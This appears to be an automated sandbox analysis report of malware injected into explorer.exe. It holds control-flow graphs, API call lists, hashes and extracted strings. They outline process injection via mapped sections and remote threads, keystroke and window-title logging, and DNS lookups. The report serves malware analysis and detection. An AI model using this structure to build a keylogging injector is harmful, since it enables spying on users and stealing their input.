                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2482764027-0
                                                                                                                          • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                          • Instruction ID: f39b04ef052b0c3d8728d0a1cc5950680e9c3b9543529b71b6912a72ec38b370
                                                                                                                          • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                          • Instruction Fuzzy Hash: 3B8131312186088FE71AEF54EC58BEAB7A1FB51740F54462AA457C71B0EF78DA08CF81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 68 14a048-14a04b 69 14a055-14a059 68->69 70 14a065 69->70 71 14a05b-14a063 69->71 72 14a067 70->72 73 14a04d-14a053 70->73 71->70 74 14a06a-14a071 72->74 73->69 76 14a073-14a07b 74->76 77 14a07d 74->77 76->77 77->74 78 14a07f-14a082 77->78 79 14a084-14a092 78->79 80 14a097-14a0a4 78->80 81 14a094-14a095 79->81 82 14a0ce-14a0e9 79->82 90 14a0a6-14a0a8 80->90 91 14a0be-14a0cc call 14a00a 80->91 81->80 83 14a11a-14a11d 82->83 85 14a122-14a129 83->85 86 14a11f-14a120 83->86 89 14a12f-14a133 85->89 88 14a101-14a105 86->88 92 14a107-14a10a 88->92 93 14a0eb-14a0ee 88->93 94 14a135-14a14e LoadLibraryA 89->94 95 14a190-14a1e4 VirtualProtect * 2 89->95 97 14a0ab-14a0b2 90->97 91->69 92->85 98 14a10c-14a110 92->98 93->85 96 14a0f0 93->96 101 14a14f-14a156 94->101 99 14a1e8-14a1ed 95->99 102 14a0f1-14a0f5 96->102 114 14a0b4-14a0ba 97->114 115 14a0bc 97->115 98->102 103 14a112-14a119 98->103 99->99 104 14a1ef-14a1fe 99->104 101->89 106 14a158 101->106 102->88 109 14a0f7-14a0f9 102->109 103->83 107 14a164-14a16c 106->107 108 14a15a-14a162 106->108 112 14a16e-14a17a 107->112 108->112 109->88 113 14a0fb-14a0ff 109->113 117 14a185-14a18f 112->117 118 14a17c-14a183 112->118 113->88 113->92 114->115 115->91 115->97 118->101
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE ref: 0014A147
                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0014A1BB
                                                                                                                          • VirtualProtect.KERNELBASE ref: 0014A1D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.2534653037.0000000000147000.00000040.80000000.00040000.00000000.sdmp, Offset: 00147000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_147000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual$LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 895956442-0
                                                                                                                          • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                          • Instruction ID: f518b31bd2edf58260fb9bee1feb1a75e172fb027cae29ad9b437d35c57481e1
                                                                                                                          • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                          • Instruction Fuzzy Hash: 19518D323D891D0BCB28AB3C9CD06F5B7C1EF59325F96072AD08AC32A4D759D8468383

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:14.9%
                                                                                                                          Dynamic/Decrypted Code Coverage:97.6%
                                                                                                                          Signature Coverage:18.6%
                                                                                                                          Total number of Nodes:333
                                                                                                                          Total number of Limit Nodes:7
                                                                                                                          execution_graph 1032 151581 1033 15158e 1032->1033 1034 151623 1033->1034 1035 1515a7 GlobalLock 1033->1035 1035->1034 1036 1515b5 1035->1036 1037 1515e4 1036->1037 1038 1515c0 1036->1038 1053 15293e 1037->1053 1039 1515c5 lstrlenW 1038->1039 1040 1515f2 1038->1040 1052 152a09 GetProcessHeap RtlAllocateHeap 1039->1052 1043 152724 VirtualQuery 1040->1043 1044 1515fb 1043->1044 1046 1515ff lstrlenW 1044->1046 1047 15161b GlobalUnlock 1044->1047 1045 1515d8 lstrcatW 1045->1040 1046->1047 1048 15160a 1046->1048 1047->1034 1060 1516b9 RtlEnterCriticalSection 1048->1060 1050 151614 1051 1529eb 3 API calls 1050->1051 1051->1047 1052->1045 1054 152982 1053->1054 1055 15294d lstrlen 1053->1055 1054->1040 1079 152a09 GetProcessHeap RtlAllocateHeap 1055->1079 1057 152963 MultiByteToWideChar 1057->1054 1058 15297b 1057->1058 1059 1529eb 3 API calls 1058->1059 1059->1054 1061 1516d2 lstrlenW 1060->1061 1062 1517ce RtlLeaveCriticalSection 1060->1062 1063 1516ed lstrlenW 1061->1063 1064 1517bd 1061->1064 1062->1050 1066 151702 1063->1066 1064->1062 1065 15174e GetForegroundWindow 1065->1064 1068 15175a GetWindowTextW 1065->1068 1066->1065 1067 151723 1066->1067 1067->1064 1080 1517dc 1067->1080 1070 151771 GetClassNameW 1068->1070 1071 15177a lstrcmpW 1068->1071 1070->1071 1073 1517bf lstrcatW 1071->1073 1074 15178b lstrcpyW 1071->1074 1072 15172f wsprintfW 1075 1517b6 1072->1075 1073->1064 1076 1517dc 4 API calls 1074->1076 1078 1529eb 3 API calls 1075->1078 1077 151798 wsprintfW 1076->1077 1077->1075 1078->1064 1079->1057 1083 152a09 GetProcessHeap RtlAllocateHeap 1080->1083 1082 1517ed GetLocalTime wsprintfW 1082->1072 1083->1082 778 159ae0 779 159ca4 778->779 780 159aeb 778->780 779->779 781 159bfa LoadLibraryA 780->781 785 159c3f VirtualProtect VirtualProtect 780->785 782 159c11 781->782 782->780 784 159c23 GetProcAddress 782->784 784->782 786 159c39 784->786 785->779 787 151000 788 151007 787->788 789 151010 787->789 791 151016 788->791 834 152724 VirtualQuery 791->834 794 151098 794->789 796 15102c RtlMoveMemory 797 151072 GetCurrentProcessId 796->797 798 15104d 796->798 802 151093 797->802 803 15109f 797->803 864 152a09 GetProcessHeap RtlAllocateHeap 798->864 800 151053 RtlMoveMemory 800->797 802->794 805 151096 802->805 837 1510a5 803->837 865 1513ae RtlZeroMemory VirtualQuery 805->865 806 1510a4 808 152a09 GetProcessHeap RtlAllocateHeap 806->808 809 1510bf 808->809 810 152a09 GetProcessHeap RtlAllocateHeap 809->810 811 1510cc wsprintfA 810->811 816 1510f3 811->816 812 15276d OpenFileMappingA MapViewOfFile 812->816 813 15129a Sleep 813->816 814 15275a UnmapViewOfFile CloseHandle 814->813 815 152841 lstrlen lstrlen 815->816 816->812 816->813 816->815 817 152a09 GetProcessHeap RtlAllocateHeap 816->817 819 151285 816->819 818 151150 RtlMoveMemory CreateToolhelp32Snapshot 817->818 818->819 820 151171 Process32First 818->820 819->814 821 1529eb VirtualQuery GetProcessHeap HeapFree 819->821 822 15118d 820->822 823 15127e CloseHandle 820->823 821->819 824 151190 CharLowerA 822->824 823->819 825 151266 Process32Next 824->825 826 1511ab lstrcmpiA 824->826 825->824 827 1511c3 825->827 826->825 826->827 827->823 827->825 828 1512ae 16 API calls 827->828 829 1511d6 827->829 828->827 829->825 830 1526c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 829->830 831 152724 VirtualQuery 829->831 832 151208 lstrcmpiA 829->832 833 1518bf 30 API calls 829->833 830->829 831->829 832->829 833->829 835 15101e 834->835 835->794 836 152a09 GetProcessHeap RtlAllocateHeap 835->836 836->796 894 152a09 GetProcessHeap RtlAllocateHeap 837->894 839 1510bf 895 152a09 GetProcessHeap RtlAllocateHeap 839->895 841 1510cc wsprintfA 846 1510f3 841->846 843 15129a Sleep 843->846 845 152841 lstrlen lstrlen 845->846 846->843 846->845 849 151285 846->849 896 15276d OpenFileMappingA 846->896 899 152a09 GetProcessHeap RtlAllocateHeap 846->899 848 151150 RtlMoveMemory CreateToolhelp32Snapshot 848->849 850 151171 Process32First 848->850 956 1529eb 849->956 961 15275a UnmapViewOfFile CloseHandle 849->961 852 15118d 850->852 853 15127e CloseHandle 850->853 854 151190 CharLowerA 852->854 853->849 855 151266 Process32Next 854->855 856 1511ab lstrcmpiA 854->856 855->854 857 1511c3 855->857 856->855 856->857 857->853 857->855 863 1511d6 857->863 900 1512ae 857->900 860 152724 VirtualQuery 860->863 861 151208 lstrcmpiA 861->863 863->855 863->860 863->861 919 1526c9 OpenProcess 863->919 925 1518bf 863->925 864->800 866 1513e4 865->866 986 152a09 GetProcessHeap RtlAllocateHeap 866->986 868 151402 GetModuleFileNameA 987 152a09 GetProcessHeap RtlAllocateHeap 868->987 870 151418 GetCurrentProcessId wsprintfA 988 152799 CryptAcquireContextA 870->988 873 15145f RtlInitializeCriticalSection 993 152a09 GetProcessHeap RtlAllocateHeap 873->993 874 15151b 875 1529eb 3 API calls 874->875 877 151522 875->877 879 1529eb 3 API calls 877->879 878 15147f Sleep 994 1525f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 878->994 881 151529 RtlExitUserThread 879->881 888 151533 881->888 882 151496 GetModuleHandleA GetProcAddress 883 1514b5 882->883 884 1514c6 GetModuleHandleA GetProcAddress 882->884 1002 151f3a 883->1002 886 1514d9 884->886 887 1514ea GetModuleHandleA 884->887 889 151f3a 3 API calls 886->889 1012 151e89 887->1012 888->803 889->887 892 1525f1 10 API calls 893 151501 CreateThread CloseHandle 892->893 893->874 894->839 895->841 897 152794 896->897 898 152781 MapViewOfFile 896->898 897->846 898->897 899->848 901 1512c5 900->901 902 1513a4 900->902 901->902 962 1529bd VirtualAlloc 901->962 902->857 904 1512d9 lstrlen 963 152a09 GetProcessHeap RtlAllocateHeap 904->963 906 1512f0 907 151351 906->907 964 152841 lstrlen lstrlen 906->964 908 1529eb 3 API calls 907->908 910 151375 908->910 917 151388 PathMatchSpecA 910->917 918 151399 910->918 912 151353 RtlMoveMemory 914 152569 2 API calls 912->914 913 151329 RtlMoveMemory 966 152569 913->966 914->907 917->910 917->918 970 1529ae VirtualFree 918->970 920 1526e7 IsWow64Process 919->920 921 15271c 919->921 922 1526f8 IsWow64Process 920->922 924 15270a 920->924 921->863 923 152715 CloseHandle 922->923 922->924 923->921 924->923 926 152724 VirtualQuery 925->926 927 1518d9 926->927 928 1518eb OpenProcess 927->928 929 151b1c 927->929 928->929 930 151904 928->930 929->863 931 152724 VirtualQuery 930->931 932 15190b 931->932 932->929 933 151935 932->933 934 151919 NtSetInformationProcess 932->934 971 151b26 933->971 934->933 937 151b26 2 API calls 938 15197c 937->938 939 151b19 CloseHandle 938->939 940 151b26 2 API calls 938->940 939->929 941 1519a6 940->941 977 151bbd 941->977 944 151b26 2 API calls 945 1519d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 944->945 946 151af4 CreateRemoteThread 945->946 947 151a2b 945->947 948 151b0b CloseHandle 946->948 949 151a31 CreateMutexA GetLastError 947->949 952 151a61 GetModuleHandleA GetProcAddress ReadProcessMemory 947->952 950 151b0d CloseHandle CloseHandle 948->950 949->947 951 151a4d CloseHandle Sleep 949->951 950->939 951->949 953 151a92 WriteProcessMemory 952->953 954 151aed 952->954 953->954 955 151abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 953->955 954->948 954->950 955->954 957 1529f3 956->957 958 152724 VirtualQuery 956->958 959 152a07 957->959 960 1529f7 GetProcessHeap HeapFree 957->960 958->957 959->849 960->959 961->843 962->904 963->906 965 15130c RtlZeroMemory 964->965 965->912 965->913 967 152577 lstrlen RtlMoveMemory 966->967 968 1525a1 966->968 967->968 968->906 970->902 972 15195a 971->972 973 151b3a 971->973 972->937 974 151b4a NtCreateSection 973->974 975 151b69 973->975 974->975 975->972 976 151b7e NtMapViewOfSection 975->976 976->972 978 151bd4 977->978 984 151c06 977->984 979 151bd6 RtlMoveMemory 978->979 979->979 979->984 980 151c69 981 1519b6 NtUnmapViewOfSection 980->981 982 151c87 LdrProcessRelocationBlock 980->982 981->944 982->980 982->981 983 151c17 LoadLibraryA 983->981 983->984 984->980 984->983 985 151c47 GetProcAddress 984->985 985->981 985->984 986->868 987->870 989 1527bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 988->989 990 151445 CreateMutexA GetLastError 988->990 991 152805 wsprintfA 989->991 990->873 990->874 991->991 992 152827 CryptDestroyHash CryptReleaseContext 991->992 992->990 993->878 995 152631 994->995 996 152681 CloseHandle 995->996 997 152671 Thread32Next 995->997 998 15263d OpenThread 995->998 996->882 997->995 999 152660 ResumeThread 998->999 1000 152658 SuspendThread 998->1000 1001 152666 CloseHandle 999->1001 1000->1001 1001->997 1003 151f44 1002->1003 1010 151fad 1002->1010 1003->1010 1021 151fea VirtualProtect 1003->1021 1005 151f5b 1005->1010 1022 1529bd VirtualAlloc 1005->1022 1007 151f67 1008 151f71 RtlMoveMemory 1007->1008 1011 151f84 1007->1011 1008->1011 1010->884 1023 151fea VirtualProtect 1011->1023 1013 152724 VirtualQuery 1012->1013 1014 151e93 1013->1014 1017 1514fa 1014->1017 1024 151ed8 1014->1024 1017->892 1019 151eba 1019->1017 1029 151fea VirtualProtect 1019->1029 1021->1005 1022->1007 1023->1010 1025 151eea 1024->1025 1027 151e9e 1024->1027 1026 151f04 lstrcmp 1025->1026 1025->1027 1026->1025 1026->1027 1027->1017 1028 151fea VirtualProtect 1027->1028 1028->1019 1029->1017 1030 1529bd VirtualAlloc 1084 15182d 1085 151838 RtlEnterCriticalSection lstrlenW 1084->1085 1086 1518a8 RtlLeaveCriticalSection Sleep 1085->1086 1091 151854 1085->1091 1086->1085 1091->1086 1092 1529eb VirtualQuery GetProcessHeap HeapFree 1091->1092 1093 1525a4 1091->1093 1099 15200d 1091->1099 1110 1529ae VirtualFree 1091->1110 1111 152a09 GetProcessHeap RtlAllocateHeap 1091->1111 1092->1091 1094 1525b9 CryptBinaryToStringA 1093->1094 1095 1525e8 1093->1095 1094->1095 1096 1525cc 1094->1096 1095->1091 1112 152a09 GetProcessHeap RtlAllocateHeap 1096->1112 1098 1525d7 CryptBinaryToStringA 1098->1095 1100 152030 1099->1100 1101 152023 lstrlen 1099->1101 1113 152a09 GetProcessHeap RtlAllocateHeap 1100->1113 1101->1100 1103 152038 lstrcat 1104 152074 1103->1104 1105 15206d lstrcat 1103->1105 1114 1520a1 1104->1114 1105->1104 1108 1529eb 3 API calls 1109 152097 1108->1109 1109->1091 1110->1091 1111->1091 1112->1098 1113->1103 1148 15240f 1114->1148 1118 1520ce 1153 15298a lstrlen MultiByteToWideChar 1118->1153 1120 1520dd 1154 1524cc RtlZeroMemory 1120->1154 1123 15212f RtlZeroMemory 1125 152164 1123->1125 1124 1529eb 3 API calls 1126 152084 1124->1126 1128 1523f1 1125->1128 1131 152192 1125->1131 1156 15243d 1125->1156 1126->1108 1128->1124 1129 1523d7 1129->1128 1130 1529eb 3 API calls 1129->1130 1130->1128 1131->1129 1165 152a09 GetProcessHeap RtlAllocateHeap 1131->1165 1133 152262 wsprintfW 1134 152288 1133->1134 1137 1522f5 1134->1137 1166 152a09 GetProcessHeap RtlAllocateHeap 1134->1166 1136 1522c2 wsprintfW 1136->1137 1147 1523b4 1137->1147 1167 152a09 GetProcessHeap RtlAllocateHeap 1137->1167 1138 1529eb 3 API calls 1140 1523c8 1138->1140 1140->1129 1141 1529eb 3 API calls 1140->1141 1141->1129 1142 152340 1143 1523ad 1142->1143 1168 1529bd VirtualAlloc 1142->1168 1145 1529eb 3 API calls 1143->1145 1145->1147 1146 15239a RtlMoveMemory 1146->1143 1147->1138 1149 152419 1148->1149 1150 1520c0 1148->1150 1151 152841 2 API calls 1149->1151 1152 152a09 GetProcessHeap RtlAllocateHeap 1150->1152 1151->1150 1152->1118 1153->1120 1155 1520ed 1154->1155 1155->1123 1155->1128 1157 1524ab 1156->1157 1159 15244a 1156->1159 1157->1131 1158 15244e DnsQuery_W 1158->1159 1159->1157 1159->1158 1160 15248d DnsFree inet_ntoa 1159->1160 1160->1159 1161 1524ad 1160->1161 1169 152a09 GetProcessHeap RtlAllocateHeap 1161->1169 1163 1524b7 1170 15298a lstrlen MultiByteToWideChar 1163->1170 1165->1133 1166->1136 1167->1142 1168->1146 1169->1163 1170->1157 1171 1529df 1172 152724 VirtualQuery 1171->1172 1173 1529f3 1172->1173 1174 152a07 1173->1174 1175 1529f7 GetProcessHeap HeapFree 1173->1175 1175->1174 1031 1529ae VirtualFree 1176 15162b 1177 15163c 1176->1177 1178 1516aa 1176->1178 1177->1178 1179 15164b GetKeyboardState 1177->1179 1179->1178 1180 15165c ToUnicode 1179->1180 1181 151684 1180->1181 1181->1178 1182 1516b9 19 API calls 1181->1182 1182->1178

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_00151016 5 Function_0015288D 0->5 6 Function_0015268F 0->6 9 Function_00152A09 0->9 17 Function_001518BF 0->17 22 Function_001510A5 0->22 23 Function_00152724 0->23 31 Function_001512AE 0->31 32 Function_001526AE 0->32 33 Function_001513AE 0->33 39 Function_0015275A 0->39 40 Function_00152841 0->40 43 Function_001526C9 0->43 47 Function_0015276D 0->47 49 Function_001529EB 0->49 1 Function_00152799 2 Function_00151581 2->9 19 Function_0015293E 2->19 20 Function_001516B9 2->20 2->23 2->49 3 Function_00151000 3->0 4 Function_0015200D 4->9 28 Function_001520A1 4->28 4->49 7 Function_0015240F 7->40 8 Function_00151E89 8->23 38 Function_00151ED8 8->38 50 Function_00151FEA 8->50 10 Function_0015298A 11 Function_00153135 12 Function_00151FB4 26 Function_00151E26 12->26 13 Function_00151533 14 Function_001529BD 15 Function_00151BBD 16 Function_0015243D 16->9 16->10 17->15 17->23 27 Function_00151B26 17->27 18 Function_00151CBF 19->9 19->49 36 Function_001517DC 20->36 20->49 21 Function_00151F3A 21->12 21->14 45 Function_00151E66 21->45 21->50 22->5 22->6 22->9 22->17 22->23 22->31 22->32 22->39 22->40 22->43 22->47 22->49 24 Function_001525A4 24->9 25 Function_00153627 26->18 28->5 28->7 28->9 28->10 28->14 28->16 42 Function_001524CC 28->42 28->49 29 Function_0015182D 29->4 29->9 29->24 30 Function_001529AE 29->30 29->49 31->9 31->14 31->30 35 Function_0015255C 31->35 31->40 48 Function_00152569 31->48 31->49 33->1 33->8 33->9 33->21 44 Function_001525F1 33->44 33->49 34 Function_0015162B 34->20 36->9 37 Function_001529DF 37->23 41 Function_0015314D 45->18 46 Function_00159AE0 49->23

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00152724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001529F3,-00000001,0015128C), ref: 00152731
                                                                                                                            • Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
                                                                                                                            • Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00151038
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0015106C
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00151075
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00151010), ref: 0015107B
                                                                                                                          • wsprintfA.USER32 ref: 001510E7
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00151155
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00151160
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 0015117F
                                                                                                                          • CharLowerA.USER32(?), ref: 00151199
                                                                                                                          • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001511B5
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00151212
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 0015126C
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0015127F
                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 0015129F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                          • String ID: %s%s$0-gwP,gw$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                          • API String ID: 3206029838-1042237000
                                                                                                                          • Opcode ID: 204bc71d99b49e077968bc2599fdb285d2e10d7aa7264a181ac056647d663afe
                                                                                                                          • Instruction ID: 83d1d87f04e0612a21d630331060ae7d482e2acddbfeb51c713951f9e29dfaeb
                                                                                                                          • Opcode Fuzzy Hash: 204bc71d99b49e077968bc2599fdb285d2e10d7aa7264a181ac056647d663afe
                                                                                                                          • Instruction Fuzzy Hash: 0F51F531204300EBC715EF70DC98A7A77AAEB55753F100628FD758F6E1EB349A8D8A61

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
                                                                                                                            • Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13
                                                                                                                          • wsprintfA.USER32 ref: 001510E7
                                                                                                                            • Part of subcall function 0015276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00152777
                                                                                                                            • Part of subcall function 0015276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001510FE), ref: 00152789
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00151155
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00151160
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 0015117F
                                                                                                                          • CharLowerA.USER32(?), ref: 00151199
                                                                                                                          • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001511B5
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00151212
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 0015126C
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0015127F
                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 0015129F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                          • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                          • API String ID: 3018447944-2805246637
                                                                                                                          • Opcode ID: 4071634a63e7de8ef737af36a43aadab8a8af76dd2fa5936fe86449b77c688f8
                                                                                                                          • Instruction ID: 986390ebafcb242557c084c17a57d06d141a8fc150e4f492da782f5f5512c195
                                                                                                                          • Opcode Fuzzy Hash: 4071634a63e7de8ef737af36a43aadab8a8af76dd2fa5936fe86449b77c688f8
                                                                                                                          • Instruction Fuzzy Hash: 7F41C331204304EBC715AF748C85A3A77AAAB95787F100A2CFD718F2D1EB349E4D8A61

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 123 159ae0-159ae5 124 159cad 123->124 125 159aeb-159af8 123->125 124->124 126 159b0a-159b0f 125->126 127 159b11 126->127 128 159b00-159b05 127->128 129 159b13 127->129 131 159b06-159b08 128->131 130 159b18-159b1a 129->130 132 159b23-159b27 130->132 133 159b1c-159b21 130->133 131->126 131->127 132->130 134 159b29 132->134 133->132 135 159b34-159b39 134->135 136 159b2b-159b32 134->136 137 159b48-159b4a 135->137 138 159b3b-159b44 135->138 136->130 136->135 141 159b53-159b57 137->141 142 159b4c-159b51 137->142 139 159b46 138->139 140 159bba-159bbd 138->140 139->137 143 159bc2-159bc5 140->143 144 159b60-159b62 141->144 145 159b59-159b5e 141->145 142->141 146 159bc7-159bc9 143->146 147 159b84-159b93 144->147 148 159b64 144->148 145->144 146->143 151 159bcb-159bce 146->151 149 159b95-159b9c 147->149 150 159ba4-159bb1 147->150 152 159b65-159b67 148->152 149->149 155 159b9e 149->155 150->150 156 159bb3-159bb5 150->156 151->143 157 159bd0-159bec 151->157 153 159b70-159b74 152->153 154 159b69-159b6e 152->154 153->152 158 159b76 153->158 154->153 155->131 156->131 157->146 159 159bee 157->159 161 159b81 158->161 162 159b78-159b7f 158->162 160 159bf4-159bf8 159->160 163 159c3f-159c42 160->163 164 159bfa-159c10 LoadLibraryA 160->164 161->147 162->152 162->161 166 159c45-159c4c 163->166 165 159c11-159c16 164->165 165->160 167 159c18-159c1a 165->167 168 159c70-159ca0 VirtualProtect * 2 166->168 169 159c4e-159c50 166->169 170 159c23-159c30 GetProcAddress 167->170 171 159c1c-159c22 167->171 174 159ca4-159ca8 168->174 172 159c63-159c6e 169->172 173 159c52-159c61 169->173 175 159c32-159c37 170->175 176 159c39-159c3c 170->176 171->170 172->173 173->166 174->174 177 159caa 174->177 175->165 177->124
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000158000.00000040.80000000.00040000.00000000.sdmp, Offset: 00158000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_158000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6c042051a4316af95e6db2e33ed4a8c4f3ee85d51b8b0f0f4500bd5334e5e81e
                                                                                                                          • Instruction ID: 0cc462f5ac0943fbc4d60f618c75aecfbd516f4ae8548bcefc2df28eab80c648
                                                                                                                          • Opcode Fuzzy Hash: 6c042051a4316af95e6db2e33ed4a8c4f3ee85d51b8b0f0f4500bd5334e5e81e
                                                                                                                          • Instruction Fuzzy Hash: B85109B1A44252CBE7218A78DC80BB4B794EB51322B280739DDF6CF3C5E794580EC792

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 178 15276d-15277f OpenFileMappingA 179 152794-152798 178->179 180 152781-152791 MapViewOfFile 178->180 180->179
                                                                                                                          APIs
                                                                                                                          • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00152777
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001510FE), ref: 00152789
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$MappingOpenView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3439327939-0
                                                                                                                          • Opcode ID: 0abb2dff01804e31d28d6fbdefbb92610e79ea8adf99ea560c8dbde28b9ebf89
                                                                                                                          • Instruction ID: 56f7c24d5de4b322a3fbee693bba5e57994e2505f266ff04c8fd4fc71bd76cc6
                                                                                                                          • Opcode Fuzzy Hash: 0abb2dff01804e31d28d6fbdefbb92610e79ea8adf99ea560c8dbde28b9ebf89
                                                                                                                          • Instruction Fuzzy Hash: D6D01732701331BBE3745A7B6C0CF83AE9DDF86AF2B010025B91DD7190D6608810C2F0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 181 152a09-152a19 GetProcessHeap RtlAllocateHeap
                                                                                                                          APIs
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00152A13
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1357844191-0
                                                                                                                          • Opcode ID: 95a4684d8bac678dcdb0dd0f6a43987ad42c4037b1c80039d0a69228ece358d1
                                                                                                                          • Instruction ID: c009171768f83958ece6f78f2d1557d9c71ddde3e049e8dc67002dc0af7d61e0
                                                                                                                          • Opcode Fuzzy Hash: 95a4684d8bac678dcdb0dd0f6a43987ad42c4037b1c80039d0a69228ece358d1
                                                                                                                          • Instruction Fuzzy Hash: F0A002B1650300EFDD4557A49D0DF197658A744743F0045447256CE4D09D7555949731

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 182 1529bd-1529cd VirtualAlloc
